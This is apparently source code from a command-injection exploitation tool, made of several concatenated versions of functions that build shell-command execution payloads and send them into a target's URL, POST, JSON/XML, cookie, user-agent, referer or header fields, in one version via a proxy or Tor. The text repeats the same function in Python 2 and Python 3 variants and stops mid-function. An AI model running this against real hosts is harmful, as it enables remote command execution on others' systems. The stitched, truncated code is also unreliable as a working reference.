def injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell :
payload = fb_payloads.cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
payload_msg = payload.replace("\n", "\\n")
if settings.COMMENT in payload_msg:
payload_msg = payload_msg.split(settings.COMMENT)[0]
sys.stdout.write("\n" + settings.print_payload(payload_msg))
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
payload = payload.replace(" ","%20")
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = get_request_response(request)
else :
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = get_request_response(request)
return response
def check_injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell :
payload = fb_payloads.cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
if settings.COMMENT in payload_msg:
payload = payload.split(settings.COMMENT)[0].strip()
payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
info_msg = "Executing the '" + cmd.split(settings.COMMENT)[0].strip() + "' command... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
output_payload = "\n" + settings.print_payload(payload)
if settings.VERBOSITY_LEVEL >= 1:
output_payload = output_payload + "\n"
sys.stdout.write(output_payload)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined host with "INJECT_HERE" tag
elif menu.options.host and settings.INJECT_TAG in menu.options.host:
response = host_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
payload = payload.replace(" ","%20")
target = url.replace(settings.INJECT_TAG, payload)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else :
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON:
payload = payload.replace("\"", "\\\"")
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
else:
if settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response
def check_injection(separator, payload, TAG, cmd, prefix, suffix,
whitespace, http_request_method, url, vuln_parameter,
OUTPUT_TEXTFILE, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = fb_payloads.cmd_execution_alter_shell(
separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd,
OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
if settings.COMMENT in payload_msg:
payload = payload.split(settings.COMMENT)[0].strip()
payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
info_msg = "Executing the '" + cmd.split(
settings.COMMENT)[0].strip() + "' command... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
output_payload = "\n" + settings.print_payload(payload)
if settings.VERBOSITY_LEVEL >= 1:
output_payload = output_payload + "\n"
sys.stdout.write(output_payload)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined host with "INJECT_HERE" tag
elif menu.options.host and settings.INJECT_TAG in menu.options.host:
response = host_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter,
payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
payload = payload.replace(" ", "%20")
target = url.replace(settings.INJECT_TAG, payload)
vuln_parameter = ''.join(vuln_parameter)
request = _urllib.request.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else:
# Check if defined method is POST.
parameter = menu.options.data
parameter = _urllib.parse.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON:
data = parameter.replace(
settings.INJECT_TAG,
_urllib.parse.unquote(payload.replace("\"", "\\\"")))
try:
data = checks.json_data(data)
except ValueError:
pass
elif settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG,
_urllib.parse.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response
def check_injection(separator, payload, TAG, cmd, prefix, suffix,
whitespace, http_request_method, url, vuln_parameter,
OUTPUT_TEXTFILE, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = fb_payloads.cmd_execution_alter_shell(
separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd,
OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
if settings.TAMPER_SCRIPTS['base64encode']:
from src.core.tamper import base64encode
payload = base64encode.encode(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
if settings.COMMENT in payload_msg:
payload_msg = payload_msg.split(settings.COMMENT)[0]
info_msg = "Executing the '" + cmd.split(
settings.COMMENT)[0] + "' command "
sys.stdout.write("\n" + settings.print_info_msg(info_msg))
sys.stdout.flush()
sys.stdout.write(
"\n" +
settings.print_payload(payload).split(settings.COMMENT)[0] +
"\n")
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter,
payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
payload = payload.replace(" ", "%20")
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else:
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
parameter)
try:
data = json.loads(data, strict=False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response
def injection(separator, payload, TAG, cmd, prefix, suffix,
http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = fb_payloads.cmd_execution_alter_shell(
separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload.replace("\n", "\\n") + Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
payload = payload.replace(" ", "%20")
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = get_request_response(request)
else:
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
parameter)
data = json.loads(data, strict=False)
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = get_request_response(request)
return response
def injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell :
payload = fb_payloads.cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
payload = payload.replace(" ","%20")
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
else: